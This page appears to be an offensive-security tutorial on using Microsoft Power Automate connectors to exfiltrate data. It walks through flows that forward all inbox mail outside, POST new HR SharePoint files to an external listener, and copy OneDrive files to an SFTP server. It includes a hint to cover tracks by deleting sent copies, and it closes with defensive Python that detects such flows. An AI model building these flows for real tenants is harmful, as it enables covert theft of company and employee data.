Data Exfiltration
Flow has hundreds of connectors. Many of them can be used for data exfiltration. With the help of a purpose-built flow, data can be exfiltrated automatically. Below are a few examples that are designed to exfiltrate data.
Keep in mind that these are just examples and they can be mixed and matched to meet whatever needs you may have.
Forward a copy of all emails
One popular way of persistent data exfiltration is to send a copy of all incoming emails to an outside email address by way of an Outlook rule.
This technique is popular enough that defenders are now aware of this methodology and make an active effort to check for and discover the malicious rules. Another way to accomplish this is to leverage Flow.
The flow below takes any email that arrives in the 'Inbox' and sends it to an external address of our choice.

The next step of this flow should be to delete the email from the sent folder. I'll let you figure out the best way to accomplish this.
New SharePoint File -> HTTP Post
Another way to move data out of an organization is by using the HTTP connector. The flow below leverages the SharePoint connector to act as the trigger when a file is created. The trigger is monitoring the jellypark SharePoint server, specifically the hr site.
Within the site, the trigger is monitoring the employee-records folder. Any time a new file is created the flow begins and moves into the action section.
The action for this flow is using the HTTP connector to make a POST request to an external website (hxxps://listener.somelisteningwebsite.com). The body of the post request is very important. It is JSON data which contains two dynamic variables depending on the file created in the trigger.
The value of the 'File name' variable is the name of the file created and the 'File Content' variable is filled with the contents of the file. All of this data is wrapped up into the JSON so that when it arrives at the listener website it can easily be reconstructed.

New OneDrive File -> SFTP
Much like the SharePoint trigger waiting for a new file to be created within a folder, the OneDrive trigger for new file creation works the same way. When configuring the 'When a file is created' trigger the only option required is to set the folder to monitor.
For the action portion of this flow we are going to leverage the SFTP connector to send the file to a remote server. Before we can use the connector the SFTP connection needs to be defined. This connection can be used for multiple flows. At minimum to establish the connection it needs:
A name
Server address
User Name
Other options such as port, password, and private key can also be defined. The image below shows an example SFTP connection.

Upon clicking the 'Create' button Microsoft will validate the connection to make sure it works. If it fails to connect it will throw an error.
Now that the connection is valid we can finish defining the 'Create file' action. The action requires a folder path on the remote server, a file name, and file content. File name and File content can both be dynamically generated based on the output from the trigger.
Below is a fully functional flow that detects when a file is created in the root folder of the user's OneDrive and then sends it to a remote server via SFTP.
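From the defender's side, all three flows on this page share one shape: a trigger on a data source (Outlook inbox, SharePoint folder, OneDrive folder) chained to an outbound action (HTTP POST, SFTP 'Create file', mail to an outside address). The Python below is an added example, not part of the original page, that walks a flow definition in the exported JSON shape and flags that chain; the connector ids, parameter names and the sample flow are assumptions modelled on the 'New SharePoint File -> HTTP Post' flow, with jellypark.com assumed as the tenant's mail domain.

```python
"""Flag flows whose trigger reads tenant data and whose action sends it outside.
Constructed example; the JSON shape and connector ids are assumptions modelled
on exported Power Automate definitions, not a verified schema."""
from urllib.parse import urlparse

INTERNAL_DOMAINS = {"jellypark.com"}          # assumption: tenant mail domains
DATA_TRIGGERS = {"shared_sharepointonline", "shared_onedriveforbusiness",
                 "shared_office365"}          # Outlook trigger uses the O365 connector
SFTP_CONNECTORS = {"shared_sftpwithssh", "shared_sftp"}

def _connector(node):
    """Connector id (suffix of apiId/connectionName) or the raw action type."""
    host = node.get("inputs", {}).get("host", {})
    api = host.get("apiId") or host.get("connectionName") or ""
    return api.rsplit("/", 1)[-1] or node.get("type", "")

def _external_recipients(params):
    """Addresses in the 'To' field whose domain is not one of ours."""
    addrs = [a.strip() for a in params.get("To", "").split(";") if a.strip()]
    return [a for a in addrs if a.rsplit("@", 1)[-1].lower() not in INTERNAL_DOMAINS]

def find_exfil_paths(flow):
    """Return (trigger, action, destination) triples for data-source -> outbound chains."""
    definition = flow["properties"]["definition"]
    triggers = {n: _connector(t) for n, t in definition.get("triggers", {}).items()}
    findings = []
    for name, action in definition.get("actions", {}).items():
        inputs, dest = action.get("inputs", {}), None
        if action.get("type") == "Http":                       # raw HTTP connector
            dest = urlparse(inputs.get("uri", "")).hostname or inputs.get("uri", "?")
        elif _connector(action) in SFTP_CONNECTORS:            # SFTP 'Create file'
            dest = "sftp:" + inputs.get("parameters", {}).get("folderPath", "?")
        elif _connector(action) == "shared_office365":         # 'Send an email'
            ext = _external_recipients(inputs.get("parameters", {}))
            dest = "mail:" + ",".join(ext) if ext else None
        if dest:
            findings += [(t, name, dest) for t, c in triggers.items() if c in DATA_TRIGGERS]
    return findings

SAMPLE_FLOW = {"properties": {"definition": {   # constructed: SharePoint -> HTTP POST
    "triggers": {"When_a_file_is_created": {"type": "OpenApiConnection", "inputs": {
        "host": {"apiId": "/providers/Microsoft.PowerApps/apis/shared_sharepointonline",
                 "operationId": "OnNewFile"},
        "parameters": {"dataset": "https://jellypark.sharepoint.com/sites/hr",
                       "folderId": "/employee-records"}}}},
    "actions": {"HTTP": {"type": "Http", "inputs": {
        "method": "POST", "uri": "hxxps://listener.somelisteningwebsite.com",
        "body": {"File name": "@triggerOutputs()?['headers/x-ms-file-name']",
                 "File Content": "@triggerBody()"}}}}}}}
```

Run `find_exfil_paths` over every flow definition exported from the tenant and review each reported triple; the same check catches the Outlook forward (trigger and action both on shared_office365 with an outside recipient) and the OneDrive-to-SFTP flow.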
